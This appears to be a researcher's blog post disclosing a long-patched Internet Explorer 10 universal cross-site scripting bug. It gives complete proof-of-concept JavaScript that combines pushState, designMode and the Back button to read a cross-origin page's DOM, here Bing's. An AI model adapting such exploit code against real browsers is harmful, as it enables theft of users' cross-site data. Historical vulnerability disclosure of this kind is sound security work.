IE10 UXSS: New Window pushState + designMode + Back Button Gives Cross-Origin DOM Access

I found that opening a new window and setting an onbeforeunload handler that pushed a history state and enabled designMode — just before navigating the window to a cross-origin URL — left the window accessible after the user pressed Back. The window’s document.URL reported the original page but document.all[0].outerHTML contained the cross-origin markup. This is related to but distinct from the earlier IE10_xDom_pushStateHistoryBack finding, which affected iframes and was correctly patched separately.

function main()
{
    win = window.open("dummy.html","", "location=yes, width=600, height=200");

    win.onbeforeunload = function()
    {
        win.history.pushState("","",""); // Places an item in the history object.
        win.setTimeout('document.designMode = "On"'); // And sets its designMode.
    }
    win.location = "http://www.bing.com"; // Now change its location to the victim URL.
    setTimeout("accessWindow()", 1000);
}
function accessWindow()
{
    try
    {
        alert(win.document.all[0].outerHTML);
    }
    catch (e)
    {
        setTimeout("accessWindow()", 500);
    }
}

When the window’s onbeforeunload fired during navigation to Bing, pushState added a history entry and setTimeout scheduled designMode = "On". After pressing Back in the new window, it appeared to return to dummy.html but the DOM elements in document.all were Bing’s, allowing their outerHTML to be read by the opener.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE10 EoP: Enumerating New Window Object During Redirect is EXPLOITABLE] :: [IE10 Sandbox Bypass: Invalid Server Redirect URL Loads Error Page Outside Sandbox] >